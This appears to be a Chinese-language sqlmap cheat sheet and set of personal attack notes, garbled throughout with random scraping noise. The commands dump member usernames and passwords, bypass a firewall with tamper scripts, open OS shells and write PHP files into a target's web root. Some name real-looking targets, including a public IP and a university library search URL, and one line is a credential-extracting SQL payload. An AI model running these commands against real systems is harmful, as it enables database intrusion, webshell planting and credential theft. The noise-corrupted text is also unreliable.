/pentest/database/sqlmap1 _; C" `( N' N. v4 o5 s
" p& u. ^ B: C* H, jupdate :::::> in the folder after execute following order : svn update. h9 d& P/ G: C
- }/ G9 t* f; r3 r$ M
sqlmap.py -r 1.txt --current-db$ ?% f" n0 ~6 o" C! Y" q
! K) k4 V2 s6 ]3 T5 {3 ]: L3 h
v 3 –dbms “MySQL” –technique U -p id –batch –tamper “space2morehash.py”" w( q1 N2 [3 E9 S$ t1 u* b* X
9 e1 m/ a8 {3 v, N: ^* X
==================基本使用方法==========================elect (select concat(0x7e,0x27,username,0x3a,password,0x27,0x7e) from phpcms_member limit 0,1))
/ \# R& T7 ~3 Y/ m1 }+ z' s- T猜解数据库
# R7 A! ` ] P./sqlmap.py -u "injection-url" --dbs7 C- O7 m8 s, j; `3 P' }& r( F5 s
sqlmap.py -r 1.txt -v 3 --dbs --tamper "space2morehash.py"
" j# H! X" _- b2 d; c e8 b" H7 l
% g% e. j- g) M. C, D猜解表名
) N& f7 [/ n% s& l./sqlmap.py -u "injection-url" -D database_name --tables
9 c: k: q% R8 M, ]& Y0 C/ ^( m* D! O
sqlmap.py -r 1.txt -v 1 -D jsst --tables --batch --tamper "space2morehash.py"
0 V; W( o( a0 t+ w; Psqlmap.py -r 1.txt -v 3 -D jsst -T jsgen_member_info --columns --batch --tamper "space2morehash.py" : E( i: x( o( e9 `# m% T
& e M* [' i% P
sqlmap.py -r 1.txt -D mail -T F_domain -C F_email,F_password --dump
/ e6 S) o0 P% J# {! g" _6 U4 D6 D0 h- } s
sqlmap.py -r 1.txt -v 1 --os-shell --tamper "chardoubleencode.py"
" s# r4 `1 O+ l; c8 b: N0 asqlmap.py -r 1.txt -v 3 --os-shell --tamper "chardoubleencode.py"
. W8 ^) Q2 U/ x9 }; I1 \5 Y7 isqlmap.py -r 1.txt -v 3 --file-write c:\help.php --file-dest D:\Bitnami\wampstack-5.4.29-0\apache2\htdocs\en\fckeditor\help888.php --tamper "chardoubleencode.py"
8 B+ o$ x8 Y$ n2 `! d# h2 o, z/ qsqlmap.py -r 1.txt --dbms "Mysql" --os-shell --tamper "charunicodeencode.py"1 ~# n4 L" S* m9 z
- t3 R" u2 i/ A! vsqlmap.py -u "http://121.15.0.227/en/list.php?catid=74" --os-shell -v3 --tamper "charunicodeencode.py"1 M" f; j" j7 q9 ?# Q6 j
sqlmap.py -r 1.txt -v 3 --sql-query "desc jsgen_member;" --batch --tamper "space2morehash.py"
: k9 n3 [. U$ psqlmap.py -r 1.txt -v 3 --sql-query "show create table jsgen_member;" --batch --tamper "space2morehash.py"5 z' T6 e/ k, `6 \( e( a
sqlmap.py -r 1.txt -v 3 --sql-query "select user();" --batch --tamper "space2morehash.py"
1 D% d- p( q6 w% J D# ]sqlmap.py -r 1.txt -D jsst -T phpcms_member -C username,password --dump
" ~' {- [2 v( x3 e/ N0 p! \1 L+ _& y) X; i( d$ B
sqlmap.py -r 1.txt -v 3 --dbs --batch --tamper "space2morehash.py" 绕过防火墙了
' V d5 W6 l; ?% O, _sqlmap.py -r 1.txt -v 3 -D jsst -T jsgen_member -C ,userid,username,password, --dump --batch --tamper "space2morehash.py"4 N: |0 w' }3 k! ^/ S. {; B
9 \& m, q: n+ Q2 ~. k9 o0 a
sqlmap.py -r 1.txt --dbms "Mysql" --tables -D "jsst"
0 t/ Z2 q+ v) ?, b猜解列名
4 f/ q+ @+ J; y3 @& d; a" o./sqlmap.py -u "injection-url" -D database_name -T table_name --columns! t. z2 C6 [3 {% d; J
( Y% X) ~6 t" k# `* k+ @sqlmap.py -r 1.txt -v 3 -D jsst -T jsgen_member --columns --batch --tamper "space2morehash.py"
$ N- t& D5 M/ ? ~) wsqlmap.py -r 1.txt -v 3 -D jsst -T jsgen_session --columns --batch --tamper "space2morehash.py"
. ?* p6 x, q, ^2 p0 P2 Nsqlmap.py -r 1.txt -v 3 -D jsst -T jsgen_member -C userid,groupid,username,password,touserid,point,modelid,email,areaid --dump --batch --tamper "charunicodeencode.py"
9 [5 M- P( V6 o* W5 O. U( `1 N( c* ^5 J9 ?7 F4 Z2 c; q
sqlmap.py -u "http://cityusr.lib.cityu.edu.hk/jspui/simple-search?query=1" --batch --tamper "space2morehash.py"5 T5 v: G/ w6 m7 R8 C7 G
&submit=Go: o& r w$ f: P6 k( E+ N
猜解值
4 \2 B5 ?; ~7 D- p/ z./sqlmap.py -u "injection-url" -D database_name -T table_name -C column1,column2 --dump9 i/ u! p2 K( L
========================================================
6 f. g; e& m' t- G5 _5 i- p搜索表名中包括mana字符的4 k5 q4 h1 ?# S1 V4 M2 L9 P; _
/sqlmap.py -u "injection-url" -T mana --search; ~5 b4 }* v8 Z# I$ `8 ]5 |
返回一个交互式sql shell) R. u2 A1 o' M4 I4 w
/sqlmap.py -u "injection-url" --sql-shell
7 V5 H" m; p1 r( V- o读取指定文件(需权限)
2 f! o- b0 H( F* v4 O7 _7 |/sqlmap.py -u "injection-url" --file-read "c:\boot.ini"
. y1 A; q2 C" }; @8 ^* r$ B查看当前 用户 及 数据库 1 M9 m! {/ `( s6 l! N8 J8 ^
/sqlmap.py -u "injection-url" --current-user --current-db
, P9 O, F l4 x$ r4 Q7 s6 i本地文件 写入 远程目标绝对路径0 n8 a C6 z" t( @! k- Z
/sqlmap.py -u "injection-url" --file-write 本地路径 --file-dest 远程绝对路径
/ h4 o) i+ ?$ W* C* C1 w) Vsqlmap.py -r 1.txt -v 3 --file-write c:\help.php --file-dest D:/Bitnami/wampstack-5.4.29-0/apache2/htdocs/en/fckeditor\help888.php --tamper "charunicodeencode.py"
9 V6 e, ^4 |( S% O( i: E2 M9 E3 t' O
sqlmap.py -u "injection-url" --file-write 本地路径 --file-dest 远程绝对路径
7 L" F2 m$ [% B+ H' U; b查看某用的权限/ ]) T2 u8 [- `" \1 L
/sqlmap.py -u "injection-url" --privileges -U root. O# t8 o2 S% w9 P C
查看当前用户是否为dba6 q7 U1 S$ Z1 Y$ b2 ~% M
/sqlmap.py -u "injection-url" --is-dba
5 d2 s" {8 V. r8 g& d9 {# g" M* F读取所有数据库用户或指定数据库用户的密码6 C0 ~5 ^- m( c& w4 n+ Y
sqlmap.py -r 1.txt --users --passwords
( [3 A9 w! Y% I0 T% j1 u; Qsqlmap.py -r 1.txt -v 3 --users --passwords --batch --tamper "space2morehash.py"
4 m, k3 Q8 @ m# T* D, M2 ]1 c6 @& E" V" l9 W" |
/sqlmap.py -u "injection-url" --passwords -U root
% [ a7 Y7 I2 q8 Q
! L+ }$ ^; |' v2 e J* t--start&&--stop 与 --first&&--last 的区别 M) i! o- r# ^2 I7 F( x
/sqlmap.py -u "http://localhost/comment/index.php?keyid=1&itemid=1" -D phpcms -T phpcms_member --start=1 --stop=2 --dump (--start=1 --stop=2 会列出第二条记录。。。。记录例如:0 1 2 3 ……)
$ S9 K. w" Z$ x. \2 t ]+ j" w7 v( U/ L2 O4 b' u
从字典中查找(属于暴利破解)存在的表(sqlmap/txt/common-tables.txt)或字段(sqlmap/txt/common-columns.txt)6 L. {, t9 z3 U" r9 q P
/sqlmap.py -u "http://localhost/comment/index.php?keyid=1&itemid=1" -D database-name --common-tables
# `7 T) ^1 o, t- ^9 D/sqlmap.py -u "http://localhost/comment/index.php?keyid=1&itemid=1" -D database-name -T table_name --common-columns
6 F: Z' u& B2 j- }( y: E8 i; o! K
执行sql语句,如查询@@datadir得到数据库路径(或者user()/database()等等……)8 d M& P3 s$ s; r' W
/sqlmap.py -u "http://localhost/comment/index.php?keyid=1&itemid=1" --sql-query "select @@ip"
5 R T& W0 H% i' S) U1 Z& I) a4 d! h" s! t& d: N, a# ]- I M
|